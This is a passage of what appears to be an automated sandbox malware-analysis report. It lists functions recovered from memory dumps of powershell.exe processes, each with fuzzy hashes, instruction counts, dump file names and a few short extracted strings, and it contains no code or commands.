API ID:
String ID: +j$ +j$4\,j$4\,j$4\,j$4\,j$@b,j$@b,j
API String ID: 0-4145147032
Opcode ID: 2150866dafe0f25ecadd9ef4ce86d044974bbfb4423e3ff88e599961e4e467f4
Instruction ID: f2677e794390044c24f16ffaf742b4fd86b596eafec6bbc91586920c431e6078
Opcode Fuzzy Hash: 2150866dafe0f25ecadd9ef4ce86d044974bbfb4423e3ff88e599961e4e467f4
Instruction Fuzzy Hash: DE917BB4B4020EDFDB54CB54C554AA9BBF2AF89314F24C2A9D816AF354DB31EC42CB91

Function 07091618 Relevance: 2.9, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

G,j, xrefs: 07091658
G,j, xrefs: 0709164E

Memory Dump Source

Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: G,j$G,j
API String ID: 0-228363525
Opcode ID: 7f05c86feb96cbafd3e81f5c6792a7b38069d185939844bb27c6b1279c14aa80
Instruction ID: 9bde3c5d71f5cf69b33068b150e68d2529becc3f5bdc2c0a72936168d6de8b99
Opcode Fuzzy Hash: 7f05c86feb96cbafd3e81f5c6792a7b38069d185939844bb27c6b1279c14aa80
Instruction Fuzzy Hash: A4D13AB5B0430B9FDF959B65980066ABBF69FC6210F1482BAD542DF252DE31CC01D7A2

Function 00943870 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb1f8f93f71fc4105a8d3f4bc3f443c81b1c03861de735beaa57460855d91ef
Instruction ID: 8c954fede66ebebdbe545c17804105f3dd3589f6ae34f797da5f7391aea4663b
Opcode Fuzzy Hash: fbb1f8f93f71fc4105a8d3f4bc3f443c81b1c03861de735beaa57460855d91ef
Instruction Fuzzy Hash: B4E11574A00259DFDB15CFA8D484A9DBBB2FF89310F24C199E845AB361C735ED81CB90

Function 00948045 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 641b18bd17589c13265b785bc2fed09acacbaaaf7fe83191dcbf8dd2067f6976
Instruction ID: 2a67af0bd6472e77c7d234f27628e67c270aad02f093ea2c5505deaf84676cd1
Opcode Fuzzy Hash: 641b18bd17589c13265b785bc2fed09acacbaaaf7fe83191dcbf8dd2067f6976
Instruction Fuzzy Hash: 7AB14B70E00609CFDF14CFA9D885B9EBBF6BF88754F148529E815A7290EB749846CF81

Function 00948915 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748c022e4533e08519729d538e90d7805feac9dde098e03af33e8cfdae67d464
Instruction ID: 60c045e512c9d9b848faa3e3f0a299a11f94020e7ad2108bb2dc3876fd805895
Opcode Fuzzy Hash: 748c022e4533e08519729d538e90d7805feac9dde098e03af33e8cfdae67d464
Instruction Fuzzy Hash: 84B16C70E002098FDF14CFA9D885BAEBBF5BF48354F24852AD814A7294EB749885CF91

Function 00942FF0 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2437bb089ce5d69318a947b6a9e97ba66d44c270772b9827789557896521ac71
Instruction ID: 6a152b67f8139a32602a21ce7e19cc5864f166777d0a4b478445c47056720970
Opcode Fuzzy Hash: 2437bb089ce5d69318a947b6a9e97ba66d44c270772b9827789557896521ac71
Instruction Fuzzy Hash: 2BA17D74A002098FCB08CFA9C494EAAFBB1FF88314B258669D515AB361C732ED51CF94

Function 0094868C Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be637e9a188b739c85c1d9dcb47a732d7db6ad3c0e6c13abcee77a7caf03efd3
Instruction ID: c0d9dd03f2ce716b89ca20502b40a772ce66ddbcf7f8d46270238f6ad71b2691
Opcode Fuzzy Hash: be637e9a188b739c85c1d9dcb47a732d7db6ad3c0e6c13abcee77a7caf03efd3
Instruction Fuzzy Hash: F17169B1E002099FDF14DFA9D885B9EBBF6BF88714F248529E814A7350EB749841CF91

Function 00948698 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d29582ce734658d8cc80bc5dfcad4f51f51e2447f23c935bd90d345e885f67
Instruction ID: 9036039531cc9a897b3efa31bf45d6179fdec1d0c4200ef42fb29858d851dbfd
Opcode Fuzzy Hash: 47d29582ce734658d8cc80bc5dfcad4f51f51e2447f23c935bd90d345e885f67
Instruction Fuzzy Hash: 56716AB0E002099FDF14CFA9D895B9EBBF6BF88314F248529E415A7394EB749841CF91

Function 0094382D Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7e481c13f5f1e1f933f14f0e3c3fcb1db4d40acee03d4edff2ac24b7eb262f
Instruction ID: 0f52ba039a1e4df402fe1ed7a6c48cfd09f8fbc8f1d18ad06b51c54bca61be06
Opcode Fuzzy Hash: 5e7e481c13f5f1e1f933f14f0e3c3fcb1db4d40acee03d4edff2ac24b7eb262f
Instruction Fuzzy Hash: 5C615C35A04258DFDB05CFA8D480A9CFBB1FF49320F25819AE855AB762C731EE41CB91

Function 00943100 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5d1d72f94c0d0bf600cc9c495c1f51f765b1794c8ec947eb02af7200cba763
Instruction ID: 6dc57ace3567ba6e665d23b9af4533883c9e1b2b9f85e6f5b7351a5cacc51de2
Opcode Fuzzy Hash: 3c5d1d72f94c0d0bf600cc9c495c1f51f765b1794c8ec947eb02af7200cba763
Instruction Fuzzy Hash: 50412C74A006099FDB09CF59C494EAAFBB1FF48314B258259D825AB354C732FD51CFA4

Function 00946165 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a5760f9fefd06bd3b322b63461cda383ba159388ea868a10d2bbd552e5cdef
Instruction ID: a3432a2b1ba1d3a65f5472eb51665ae251e92f9a9a6f005d349ae7acc7e622ee
Opcode Fuzzy Hash: a6a5760f9fefd06bd3b322b63461cda383ba159388ea868a10d2bbd552e5cdef
Instruction Fuzzy Hash: 8D4113B1D00348EFDB14CFA9D484ADEBBF5EF49314F20842AE819AB210DB75A945CF91

Function 00946170 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2834f6b7fc5625d40fd4adb74eef5318b44c68d7d91254b1c582bb43a2cd2251
Instruction ID: a6eec4847148340694f95dd86d4e2ac905384808b5917c33c962b76f7a1d19f6
Opcode Fuzzy Hash: 2834f6b7fc5625d40fd4adb74eef5318b44c68d7d91254b1c582bb43a2cd2251
Instruction Fuzzy Hash: 014114B1D00348EFDB14CFA9D484ADEBBF5EF49314F20842AE819AB250DB74A945CF91

Function 009437B7 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a2d50b8196e71cb8cac22d58e8979dabd14581b32f77fc8b6979109d32c460
Instruction ID: 933ab83e8d79f2959760e12986c8b90ac4ebe6ab9aeac9940a3ba98b84922836
Opcode Fuzzy Hash: 98a2d50b8196e71cb8cac22d58e8979dabd14581b32f77fc8b6979109d32c460
Instruction Fuzzy Hash: 2F319E35A093558FDB06CF68C8A09A9BBB1FF4A310B2582D7D444EB362C335ED45CBA5

Function 00943860 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8177208a69dde33760054b5753c6019b8fad391d53c81dd9b564f0aca17b6983
Instruction ID: 97680267b02607d2961b60f8ae0dfa2b62ea542209fc9a554ea46b0258323976
Opcode Fuzzy Hash: 8177208a69dde33760054b5753c6019b8fad391d53c81dd9b564f0aca17b6983
Instruction Fuzzy Hash: 17313974A006199FCB04DF69D880DAAFBB1FF49310B218199E509EB751C735ED41CBA1

Function 0094833B Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bd9a8efad1b41921d588cddeb63bab4433098e74c6f0dbf189b548467d4cf0
Instruction ID: e889d621c959575062c794db0eff80a4ecccaf0130fa4795c8c318181ab549de
Opcode Fuzzy Hash: 34bd9a8efad1b41921d588cddeb63bab4433098e74c6f0dbf189b548467d4cf0
Instruction Fuzzy Hash: D2110270C04148CFCF38DE98D889BEDB779BF44719F141429D001B2191AF749C8ACB01

Non-executed Functions

Function 00947D08 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68868c17dd9ff68a907ba34e7b152514a96f3d701c5d00f4299a9c6e94057df7
Instruction ID: c82bdcf5781d27039b567cffacf7fbf9923a8936c9f1d5ae8d7c7afc2878ae1c
Opcode Fuzzy Hash: 68868c17dd9ff68a907ba34e7b152514a96f3d701c5d00f4299a9c6e94057df7
Instruction Fuzzy Hash: 48916C70E0420D9FDF14CFE9D981BAEFBF6AF88314F148569E405A7294EB349845CB91

Function 07092B58 Relevance: 12.9, Strings: 10, Instructions: 399COMMON

Download Yara Rule

Strings

@b,j, xrefs: 07092C65
@b,j, xrefs: 07092DFB
4\,j, xrefs: 07092E6F
4[,j, xrefs: 07092DCC
4[,j, xrefs: 07092D6C
4[,j, xrefs: 07092DC2
4\,j, xrefs: 07092E63
4[,j, xrefs: 07092D60
@b,j, xrefs: 07092DF1
@b,j, xrefs: 07092C6F

Memory Dump Source

Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4[,j$4[,j$4[,j$4[,j$4\,j$4\,j$@b,j$@b,j$@b,j$@b,j
API String ID: 0-2700156477
Opcode ID: 0fc22a026a97f646a433cdd7214001793bd2e704ced693b9ed513e84a7fedc14
Instruction ID: 3714e785a81ecb2c9a8a49076e71ad39474b5615f937f5f6fed2d6ac7ec6fbfb
Opcode Fuzzy Hash: 0fc22a026a97f646a433cdd7214001793bd2e704ced693b9ed513e84a7fedc14
Instruction Fuzzy Hash: E2E104B0B40308AFEB58DB64C454B6EBBF2AF85304F608279D416AF395DA71DC41DB92

Function 0709052F Relevance: 5.2, Strings: 4, Instructions: 153COMMON

Download Yara Rule

Strings

dgt, xrefs: 07090738
P0*j, xrefs: 0709065B
dgt, xrefs: 07090599
G,j, xrefs: 07090570

Memory Dump Source

Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: P0*j$G,j$dgt$dgt
API String ID: 0-2998615682
Opcode ID: d38e02ad9ad3bc28a5cea12707e0082d90229b44a3c8a374cd4faf96fa98ccbc
Instruction ID: 66369a3c5a17b88e638383758767cb94e0304e67aa45a7ca171be2a884696559
Opcode Fuzzy Hash: d38e02ad9ad3bc28a5cea12707e0082d90229b44a3c8a374cd4faf96fa98ccbc
Instruction Fuzzy Hash: D951A2B5B01206DFDF648F55C444BBEB7E2AF89220F248279E9159B290DB32DC81DB51

Analysis Process: powershell.exePID: 8336, Parent PID: 2576COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.7%
Total number of Nodes:	263
Total number of Limit Nodes:	28

Executed Functions

Function 06C315F0 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

4, xrefs: 06C31FC5

Memory Dump Source

Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 10e707f254e4a66bf5b0ad32cc6fc231cd424513764116b37be16684a145e027
Instruction ID: f45f94f0d6f6acd2d61c1964f7e84f9f2b19cde17ec265d44a3163a656aeedb6
Opcode Fuzzy Hash: 10e707f254e4a66bf5b0ad32cc6fc231cd424513764116b37be16684a145e027
Instruction Fuzzy Hash: 4CB22874A00228CFDB54CFA9C894BADB7B6BF48301F158199E505AB3A5DB71EE81CF50

Function 06C31917 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 06C31FC5

Memory Dump Source

Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: d5174a8e6e8e784059e8e8615b01b640b380642bc72bdb2e13d04d4433bf7968
Instruction ID: f59dc5a868bdeb5ea6a2eb55757663127c0130ccca5bc40f6217bb4ec695ee23
Opcode Fuzzy Hash: d5174a8e6e8e784059e8e8615b01b640b380642bc72bdb2e13d04d4433bf7968
Instruction Fuzzy Hash: 61220C74A00228CFDB64DF65C994BADB7B2BF48305F148199E509AB3A5DB31DE81CF50

Function 06C9F750 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06C9F7C6

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4ff153c0901ad12ce252155b5ac2b98a9d8c0fdd04c0f4bdb27d9b786ed899b4
Instruction ID: 83727ac19a33fae9a48a9b7846bc3d446e80acc7f58a5de1cb51a090d21e925a
Opcode Fuzzy Hash: 4ff153c0901ad12ce252155b5ac2b98a9d8c0fdd04c0f4bdb27d9b786ed899b4
Instruction Fuzzy Hash: 811138B1D003088FDB14DFAAD4847AEFBF4EB88210F60842ED019B3200C734A945CFA4

Function 06C9F758 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06C9F7C6

Memory Dump Source

Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 787d146e02155f654e0303207554ec265cbee3375bb74e6b0f5c914d67dff156
Instruction ID: d1a65f2e0a6ba2fb4e998ec1a874e9b8589b225602894fd0c2c047708eedbcc9
Opcode Fuzzy Hash: 787d146e02155f654e0303207554ec265cbee3375bb74e6b0f5c914d67dff156
Instruction Fuzzy Hash: C51106B1D003088FDB10DFAAD48479EFBF4EB89220F54842ED419A7200C778A9458FA4

Function 00E0B180 Relevance: 1.4, Instructions: 1372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dca54a73c12f1696b1b9c884fab7734bf64feb4bc27e511fc94222d7530f595
Instruction ID: 915e40d6792cb2377828441d2de5414a3b4df2dff544f9030567fae1a7c754c0
Opcode Fuzzy Hash: 1dca54a73c12f1696b1b9c884fab7734bf64feb4bc27e511fc94222d7530f595
Instruction Fuzzy Hash: 09C26A34A05249DFDB05CFA8D494A9DBBF1FF49314F24819AE844AB3A2C735ED85CB90

Function 0093A603 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_930000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a506f91b7b6a532a2c655879bec3dd4749207cf56e9214ff17d4de320897810b
Instruction ID: 1ae868dfac8e2493afbd06d186e87839233cba6d2a5dc1ce821b6de29e0e628c
Opcode Fuzzy Hash: a506f91b7b6a532a2c655879bec3dd4749207cf56e9214ff17d4de320897810b
Instruction Fuzzy Hash: 6E52C2B4A046288FCB64DF28C994B9AB7F2FB49301F1085D9E94DA7355DB30AE81CF51

Function 06C797A8 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc7e318a3d9cfb2d3f94d26c29d609d608dbc454cd2094a698c7427683236ae
Instruction ID: 9152ae80c8661b7531a433ae3eeedeac55be0b45b74cc7566281e85109d42820
Opcode Fuzzy Hash: 4dc7e318a3d9cfb2d3f94d26c29d609d608dbc454cd2094a698c7427683236ae
Instruction Fuzzy Hash: 23D1F874E14218CFEB64DFAAC885BADBBF2FB49301F1080A9D409A7355DB705985CF91

Function 06C79799 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fa98bd018f0d68667f326c962b47ce4725653ceb35471cd640da8014c24178
Instruction ID: c04211281987317132019ad61f6ae4153a10f4a3f8dc3dd95bfe732aa72bae93
Opcode Fuzzy Hash: e8fa98bd018f0d68667f326c962b47ce4725653ceb35471cd640da8014c24178
Instruction Fuzzy Hash: 69D10774E14218CFEB64DFA9C885BAEBBF2FB49301F2080A9D409A7355DB705985CF91

Function 06E667A8 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9eb914319d1c50583b03bda9b7ad929a4f957472b1d14c2eefd47a56fcd215
Instruction ID: c66166dc6cba6cd4f0dc9ae2b6c02dbd866d7369b73e255438479092b92a4d0d
Opcode Fuzzy Hash: 8e9eb914319d1c50583b03bda9b7ad929a4f957472b1d14c2eefd47a56fcd215
Instruction Fuzzy Hash: 9FC14C70D61318CFEB64CFAAC944B9DBBF2BF49344F1490A9E409A7251DB705985CF82

Function 06E67328 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fb1c09136b8ee5c656b67fe9306b2310b5d77eff1fa909d5884cfbe7f80169
Instruction ID: 8a4b3136cd74aa04ebcef188380b3e3a404b8fb352c5bbcf2c49b143bf8701b5
Opcode Fuzzy Hash: 03fb1c09136b8ee5c656b67fe9306b2310b5d77eff1fa909d5884cfbe7f80169
Instruction Fuzzy Hash: 94B1FB70D55218CFDB64CFAAD888BDDBBF2BB49348F1090A9E409A7251DB709946CF41

Function 06E667B8 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06eb73588e242ee9e56a11682b834d405bdee7f5fb1dce5e2c41bddf671d505
Instruction ID: 4942d6c43eb9b1ca50fd5c089cd8a5361bd34034eb01231de177982f3f63bdb4
Opcode Fuzzy Hash: c06eb73588e242ee9e56a11682b834d405bdee7f5fb1dce5e2c41bddf671d505
Instruction Fuzzy Hash: A0B13A70E65318CFEB64CF6AC944BEDBBF2BB49344F1490A9E409A7250DB705985CF82

Function 06E6683A Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c468a17a4241e42eb1c315c3aa23c067c4b41d332a9771c4c28044a06e44b74
Instruction ID: 897f9d2c9f623e8117c35a422aae55c1f77fea229c3664ea08e7612c804d323e
Opcode Fuzzy Hash: 3c468a17a4241e42eb1c315c3aa23c067c4b41d332a9771c4c28044a06e44b74
Instruction Fuzzy Hash: EFA11970D61318CFEBA4CFAAC584B9DBBF2BF45344F1490A9E409A7250DB749985CF82

Function 06E66D21 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbba52fe4877e3f1bbe25bcd6556af4bedae182758d438b53d80b25d7a519bf
Instruction ID: 832ccc7441bd14e5bdda75d3e290202febe28922077da1c99732d7cf7bd81e89
Opcode Fuzzy Hash: 4fbba52fe4877e3f1bbe25bcd6556af4bedae182758d438b53d80b25d7a519bf
Instruction Fuzzy Hash: 72A13A70D61318CFEBA4CF6AC584B9DBBF2BF49344F1490A9E409A7254DB709985CF82

Function 06E66A30 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b723cb0d4a4d7ffd9711acf7ec799400dfab8a406178f5bf4dcb5ae4685d7479
Instruction ID: 21ec4dbbda272f78057586b3643700e5775414eed6ed3b3690f520e5dd40edc6
Opcode Fuzzy Hash: b723cb0d4a4d7ffd9711acf7ec799400dfab8a406178f5bf4dcb5ae4685d7479
Instruction Fuzzy Hash: 36A10970D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7250DB749985CF82

Function 06C773B0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241a21a23ea9f9c3291995bdacb7befab7f1780f0bf354f23fedad74649e75bd
Instruction ID: dba1ae65b602f997f2fc6435649b99a3ad3656146454323081789b8e560c0df3
Opcode Fuzzy Hash: 241a21a23ea9f9c3291995bdacb7befab7f1780f0bf354f23fedad74649e75bd
Instruction Fuzzy Hash: 7A911674E1421CCFDBA4DFA9D445BADBBF2EB49301F109069E40AA7395DB305986CFA0

Function 06C773A0 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fac9d867ad48c0d2a5fc7c4cee50f3e540900cd417b2646d894df8f00862eb
Instruction ID: ac9514896c0430af0dcce999ec4510baee4f40e34db79a55e6e0d7727ee567d2
Opcode Fuzzy Hash: 60fac9d867ad48c0d2a5fc7c4cee50f3e540900cd417b2646d894df8f00862eb
Instruction Fuzzy Hash: 3F912874E14218CFDBA4DFA9D444BADBBF2FB49305F108169E40AA7395DB305986CF90

Function 06E66B55 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a24742e95b99029528d4a983d47e68b0d251644507826b06bb136f0c2efcc5f
Instruction ID: 4dd9d65a68c98a6b610c8a91b42f5fb5dd525b51913f9ffcba3211abee7d7023
Opcode Fuzzy Hash: 2a24742e95b99029528d4a983d47e68b0d251644507826b06bb136f0c2efcc5f
Instruction Fuzzy Hash: 66A13970D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7254DB709985CF82

Function 06C77574 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb85649af62ae321332c6efe69ec149af15796c302c6aaa372a7a4fac346ceea
Instruction ID: 7fa7ed16a9d5f7f761df1371d68107ca5cd9574895635ee739443a7d9afb8632
Opcode Fuzzy Hash: eb85649af62ae321332c6efe69ec149af15796c302c6aaa372a7a4fac346ceea
Instruction Fuzzy Hash: 1A81E574E1420CCFDBA4DFAAD445BADBBF2EB49301F109069E40AA7355DB309986CF90

Function 06E67639 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

